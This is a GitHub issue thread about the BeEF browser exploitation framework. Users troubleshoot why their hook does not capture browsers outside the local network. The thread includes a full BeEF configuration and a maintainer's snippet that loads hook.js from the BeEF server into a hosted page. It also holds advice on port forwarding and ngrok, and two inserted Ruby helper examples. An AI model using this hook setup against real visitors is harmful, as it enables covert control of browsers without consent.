beefproject / beef

The Browser Exploitation Framework Project
https://beefproject.com

beef hook working on local machine, but not on external machines #1589

Closed avatar6712 closed 5 years ago

avatar6712 commented 6 years ago

Verify first that your issue/request has not been posted previously:

Ensure you're using the latest version of BeEF.

Environment

What version/revision of BeEF are you using? 0.4.7.0

On what version of Ruby? 2.5.1p57

On what browser? Firefox ERS

On what operating system? Kali Linux

Configuration

#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.4.7.0-alpha'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80

    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"

    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"

        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        #  when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

        # Reverse Proxy / NAT
        # If BeEF is running behind a reverse proxy or NAT
        #  set the public hostname and port here
        #public: "aczero.company.com"      # public hostname/IP address
        #public_port: "3000" # experimental

        # DNS
        dns_host: "192.168.0.45"
        dns_port: 53

        # Web Admin user interface URI
        web_ui_basepath: "/ui"

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 1000 # poll BeEF every second

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        # For information on using other databases please read the
        # README.databases file

        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"

        # db_file is only used for sqlite
        db_file: "db/beef.db"

        # db connection information is only used for mysql/postgres
        db_host: "192.168.0.45"
        db_port: 3306
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef"
        db_encoding: "UTF-8"

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"

    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000

        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true

    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false

    # IP Geolocation
    # NOTE: requires MaxMind database:
    #   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
    #   gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
    geoip:
        enable: false
        database: '/opt/GeoIP/GeoLiteCity.dat'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false

    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
            key: "beef_key.pem"
            cert: "beef_cert.pem"
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true
        # this is still experimental..
        # Disable it in kali because it doesn't work with the current
        # version of ruby-rubydns (older version is required by beef-xss)
        dns:
            enable: false
        # this is still experimental..
        dns_rebinding:
            enable: false
Are you using a non-default configuration? public: "aczero.company.com" public port:"3000"

Have you enabled or disabled any BeEF extensions? No.

Summary

Please provide a summary of the issue. The hook on my website will only work on my local machine, but not remotely on external devices. I have already enabled public IP/hostname.

Expected Behaviour

What was the expected result? The victim browser would be hooked upon visiting aczero.company.com and appear in online browsers.

Actual Behaviour

What was the actual result? Victim browser was not hooked.

Steps to Reproduce

Please provide steps to reproduce this issue.

Additional Information

Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screenshots.
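An added example (not BeEF's own code and not part of the original report): a small Ruby audit of the settings in the posted configuration that matter once the server is reachable from outside the local network. The excerpt is constructed from the values in the posted file; `audit_beef_config` and the three checks are choices made for this example.

```ruby
require "yaml"
require "ipaddr"

# Constructed excerpt: only the keys checked below, with the values from
# the configuration posted in this issue.
POSTED = <<~CFG
  beef:
      restrictions:
          permitted_ui_subnet: "0.0.0.0/0"
      http:
          host: "0.0.0.0"
          https:
              enable: false
      credentials:
          user:   "beef"
          passwd: "beef"
CFG

# Same excerpt with the three settings tightened. The password is a placeholder.
HARDENED = POSTED
  .sub('"0.0.0.0/0"', '"127.0.0.1/32"')
  .sub("enable: false", "enable: true")
  .sub('passwd: "beef"', 'passwd: "REPLACE_WITH_LONG_RANDOM_VALUE"')

# Return one finding per setting that leaves the admin UI or REST API exposed.
def audit_beef_config(yaml_text)
  beef = YAML.safe_load(yaml_text).fetch("beef")
  findings = []

  subnet = beef.dig("restrictions", "permitted_ui_subnet").to_s
  # A prefix length of 0 matches every source address.
  if !subnet.empty? && IPAddr.new(subnet).prefix.zero?
    findings << "permitted_ui_subnet #{subnet} admits every source address"
  end

  creds = beef["credentials"] || {}
  if creds["passwd"].to_s == creds["user"].to_s
    findings << "credentials: password is identical to the username"
  end

  http = beef["http"] || {}
  loopback = %w[127.0.0.1 ::1 localhost].include?(http["host"].to_s)
  if !loopback && http.dig("https", "enable") != true
    findings << "http.host #{http['host']} serves the login over cleartext HTTP"
  end

  findings
end
```

`audit_beef_config(POSTED)` returns three findings and `audit_beef_config(HARDENED)` returns none.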

TheUndeadPriest commented 6 years ago

Same is happening with me. I uploaded the index.html to a website hosting site (000webhost.com) and the html contents are being displayed, but the browsers other than the host machine's aren't visible :(

bcoles commented 6 years ago

@TheUndeadPriest

I uploaded the index.html to a website

Which HTML file?

TheUndeadPriest commented 6 years ago

The file with the hook, index.html.

Thanks for replying bruv, I figured out I wasn't port forwarded for it to work on WAN, but I port forwarded port 80 and still no use :(

bcoles commented 6 years ago

Do you mean the demo index.html file? That isn't going to work.

If you want to host the script elsewhere, you need to use the BeEF script:

<html>
<script src="http://beef.local.ip.address.here:3000/hook.js"></script>
</html>

bcoles commented 6 years ago

@TheUndeadPriest check here for info on configuring for port forwarding: https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-on-a-server-behind-nat

TheUndeadPriest commented 6 years ago

I hosted the file with a script in it, and the html file is made by me in the var/www/html folder.

Anyways, thanks for replying and I will look into the port forwarding thread. Is there any way I can contact you, because most of the time in most pentesting groups I don't get a reply at all :( I promise I won't bother you much

bcoles commented 6 years ago

@TheUndeadPriest the #beefproject channel on Freenode IRC is probably best, but if you can find my Twitter or email you're welcome to try contacting me there.

TheUndeadPriest commented 6 years ago

Thanks a ton bruv ♥️

TheUndeadPriest commented 6 years ago

@bcoles

Bruv, I decided to edit the .yml file of ngrok and add multiple tunnels for port 80 and 3000 but it shows:

Failed to save authtoken to configuration file '/root/.ngrok2/ngrok.yml': yaml: line 5: found character that cannot start any token

Why is it so?

bcoles commented 6 years ago

@TheUndeadPriest you didn't mention you were using ngrok.

A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues:

As for your error yaml: line 5: found character that cannot start any token - you have malformed YAML. At a guess, you probably tried to specify a string without wrapping it in quotes, or your indentation is messed up.

TheUndeadPriest commented 6 years ago

@bcoles

So I edited the .yml file like this-

tunnels: first-app: addr: 80 proto: http second-app: addr: 3000 proto: http

Now I need to put "80" "3000" and "http" in quotes like this? Or the entire code? I am kinda noob at this so please have patience /'\

bcoles commented 6 years ago

@TheUndeadPriest I have no idea. I don't use ngrok and this isn't an issue with BeEF.

The error received says line 5 is the issue. At a guess, it's because of the - in second-app.

You should read the ngrok documentation. Additionally, your indentation is messed up.

tunnels:
  first_app:
    addr: 80
    proto: http
  second_app:
    addr: 3000
    proto: http
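An added example, not part of the original thread or of ngrok: one way to locate the line behind `found character that cannot start any token`, using Ruby's bundled YAML parser, which reports the same message text. The thread does not show the user's real file, so the sample is constructed and reproduces the message with a tab used as indentation after a key-only line; `suspect_indentation` and `yaml_problem` are names made up for this example.

```ruby
require "yaml"

# Constructed sample: a tunnels file whose fifth line is indented with a tab.
# The authtoken value is a placeholder.
BROKEN = [
  "# constructed sample",
  "authtoken: PLACEHOLDER_TOKEN",
  "tunnels:",
  "  first_app:",
  "\taddr: 80",          # line 5: tab where a new key may start
  "    proto: http",
].join("\n") + "\n"
CLEAN = BROKEN.sub("\taddr", "    addr")

# Whitespace look-alikes that often arrive through copy/paste and that the
# YAML scanner does not accept as indentation.
SUSPECT = {
  "\t" => "tab",
  "\u00A0" => "no-break space",
  "\uFEFF" => "byte order mark",
}.freeze

# Return [line_number, description] pairs for suspect leading whitespace.
def suspect_indentation(text)
  text.each_line.with_index(1).filter_map do |line, no|
    lead = line[/\A[ \t\u00A0\uFEFF]*/]
    bad = lead.chars.map { |c| SUSPECT[c] }.compact.uniq
    [no, bad.join(", ")] unless bad.empty?
  end
end

# Parse the text; return nil on success, otherwise the parser's own location
# together with the offending source line (control characters made visible).
def yaml_problem(text)
  YAML.safe_load(text)
  nil
rescue Psych::SyntaxError => e
  { line: e.line, column: e.column, problem: e.problem,
    source: text.lines[e.line - 1].to_s.inspect }
end
```

Running both functions on the file named in the error message shows whether the reported line contains an invisible character before any quoting or key names are changed.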

bcoles commented 5 years ago

#1619

ko3nd3drumm3r commented 3 years ago

this video explains it all https://www.youtube.com/watch?v=6Jr0i2GKKhA

aditya324jhj commented 1 year ago

@ko3nd3drumm3r please make the video public so that I can see it. Thank you ~Aditya

methodhenry commented 1 year ago

the execute button is missing.

swifty29320 commented 1 year ago

Do you mean the demo index.html file? That isn't going to work.

If you want to host the script elsewhere, you need to use the BeEF script:

<html>
<script src="http://beef.local.ip.address.here:3000/hook.js"></script>
</html>

for some reason my index.html is on read only and I can't edit it some1 please help

bcoles commented 1 year ago

for some reason my index.html is on read only and I can't edit it some1 please help

It may be owned by a different user. Change the file permissions or edit the file using sudo/root.

swifty29320 commented 1 year ago

Yeah, that's what I need. How do I change the file permissions?


swifty29320 commented 1 year ago

Also, do you have Discord? I was wondering if we could call and I screen share and you help me out?
